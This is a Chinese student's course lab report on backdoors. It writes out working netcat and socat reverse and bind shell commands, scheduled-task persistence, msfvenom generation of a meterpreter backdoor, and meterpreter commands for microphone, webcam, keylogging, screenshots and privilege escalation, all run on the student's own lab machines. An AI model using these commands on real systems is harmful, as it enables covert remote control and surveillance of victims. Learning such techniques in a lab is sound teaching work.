20192405张纹豪 2021-2022-2 《网络与系统攻防技术》实验二实验报告
20192405张纹豪 2021-2022-2 《网络与系统攻防技术》实验二实验报告
- 20192405张纹豪 2021-2022-2 《网络与系统攻防技术》实验二实验报告
- 一.基本概念
- 二.基础问题回答
- 三.实验过程
- 1、使用netcat获取主机操作Shell,cron启动
- 1、nc/netcat获取远程主机shelll
- 2、使用socat获取主机操作Shell, 任务计划启动
- 3、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
- (1)通过
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.129 LPORT=5332 -f exe > 20192405_backdoor.exe
命令生成后门程序 - (2)通过
ncat.exe -lv 5332 > 20192405_backdoor.exe
指令将被控制主机进入接受文件模式 - (3)在Linux中执行
nc 172.16.219.52 5332 < 20192405_backdoor.exe
,IP为WindowsIP(我换WiFi了) - (4)目标文件夹查看传输文件
- (5)在Kali上使用
msfconsole
指令进入msf控制台
- (1)通过
- 4、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
- (5)可选加分内容:使用msf生成shellcode,注入到实践1中的pwn1中,获取反弹连接shell
- 四.实验感想与收获
一.基本概念
1.定义:
不经过正常认证流程而访问系统的通道 常见途径:编译器、操作系统、应用程序、潜伏于操作系统中或伪装为特定应用的专用 后门程序 狭义概念:潜伏于操作系统中专门做后门的一个程序,可远程执行各种指令
2.过程:
1、首先有一个程序:netcat系列、metepreter、intersect等.
3、运行:
-
开机自启动技术
-
win的定时任务
-
Linux的cron
-
伪装成常用软件
-
木马化正常软件
4、避免被恶意代码检测程序发现
5、避免被本机防火墙发现:反弹式连接、加密连接、隧道技术
二.基础问题回答
1.例举你能想到的一个后门进入到你系统中的可能方式?
用来源不明的U盘拷贝文件
2.例举你知道的后门如何启动起来(win及linux)的方式?
Windows的定时任务;Linux的Cron
3.Meterpreter有哪些给你映像深刻的功能?
可以获取目标机的大部分权限,可以对用户实现监听和监视
4.如何发现自己有系统有没有被安装后门?
查看注册表和进程 看有没有异常进程;安装杀毒软件和防火墙,查杀
三.实验过程
1、使用netcat获取主机操作Shell,cron启动
1、nc/netcat获取远程主机shelll
- linux/mac自带
- Windows通过课程附件下载
(1)win获得linux的shell
- Linux查看
nc
通过man nc
命令
- 查看Windows的IP地址
- 查看Linux的IP地址
- Windows打开监听:
ncat.exe -l -p 5332
- Linux反弹连接Windows:
nc 192.168.10.113 5332 -e /bin/sh
当当当当你会惊喜的发现竟然可以通过Windows的Cmd来命令Linux主机
(2)linux获得win的shell
- Linux运行监听命令
nc -l -p 5332
- Windows反弹连接liunx
ncat.exe -e cmd.exe 192.168.80.129 5332
- 在Linux中输入任意Windows命令行命令,例如
dir
等
(3)收发消息——操作原理同上
2、使用socat获取主机操作Shell, 任务计划启动
(1)打开计算机
-----管理
-----任务计划程序
----创建任务
(2)设置任务名,新建触发器
(3)在程序或脚本
中选择socat.exe
路径,添加参数中填写tcp-listen:5332 exec:cmd.exe,pty,stderr
,把cmd.exe绑定到端口5332并把cmd.exe的stderr重定向到stdout上
(4)在kali输入socat - tcp:192.168.10.113:5332
,输入相关命令行命令如ls
检验成果
3、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
- meterpreter专门做远程连接和控制的程序
(1)通过msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.129 LPORT=5332 -f exe > 20192405_backdoor.exe
命令生成后门程序
(2)通过ncat.exe -lv 5332 > 20192405_backdoor.exe
指令将被控制主机进入接受文件模式
(3)在Linux中执行nc 172.16.219.52 5332 < 20192405_backdoor.exe
,IP为WindowsIP(我换WiFi了)
(4)目标文件夹查看传输文件
(5)在Kali上使用msfconsole
指令进入msf控制台
-
输入
use exploit/multi/handler
使用监听模块,设置payload
-
set payload windows/meterpreter/reverse_tcp
,使用和生成后门程序时相同的payload -
set LHOST 192.168.80.129 set LPORT 5332 exploit执行监听 Windows执行后门程序
4、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
(1)使用record_mic
指令可以截获一段音频
(2)使用webcam_snap
指令可以使用摄像头进行拍照
(3)使用keyscan_start
指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录
(4)使用screenshot
指令可以进行截屏
(5)输入getuid
查看当前用户,再输入getsystem
进行提权
(5)可选加分内容:使用msf生成shellcode,注入到实践1中的pwn1中,获取反弹连接shell
最终输入指令是
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.129 LPORT=5332 -x /home/kali/20192405/pwn20192405 -f elf > pwn2019240502
四.实验感想与收获
-
实验感想
整体来说,这次实验不是太难。在我看来核心的内容是nc传输文件、使用MSF生成shellcode和实现msf提权。但我在做实验的过程中遇到了不少的问题,其中不乏有非技术性输错指令,这就很费时间。我会反思减少这种错误。除此之外,也遇到了一些找了很多资料才解决的问题,通过这个过程,也让我锻炼了英语。。所以这次实验不仅让我更加了解后门,也让我在以后做实验的时候再认真一点,减少幼稚错误。
-
例举你能想到的一个后门进入到你系统中的可能方式
电脑下载的软件里面,毕竟每一个软件里面都有后门
-
例举你知道的后门如何启动起来(win及linux)的方式
linux:cron定时启动
windows:修改注册表项
-
Meterpreter有哪些给你印象深刻的功能
生成shellcode,可以获取被控机的音频文件、开启摄像头和录像功能,捕获画面。(之前关闭摄像头了,但是觉得还是害怕.jpg)
-
如何发现自己有系统有没有被安装后门
打开任务管理器,查看当前运行进程
查看注册表是否被修改过
防火墙
杀毒软件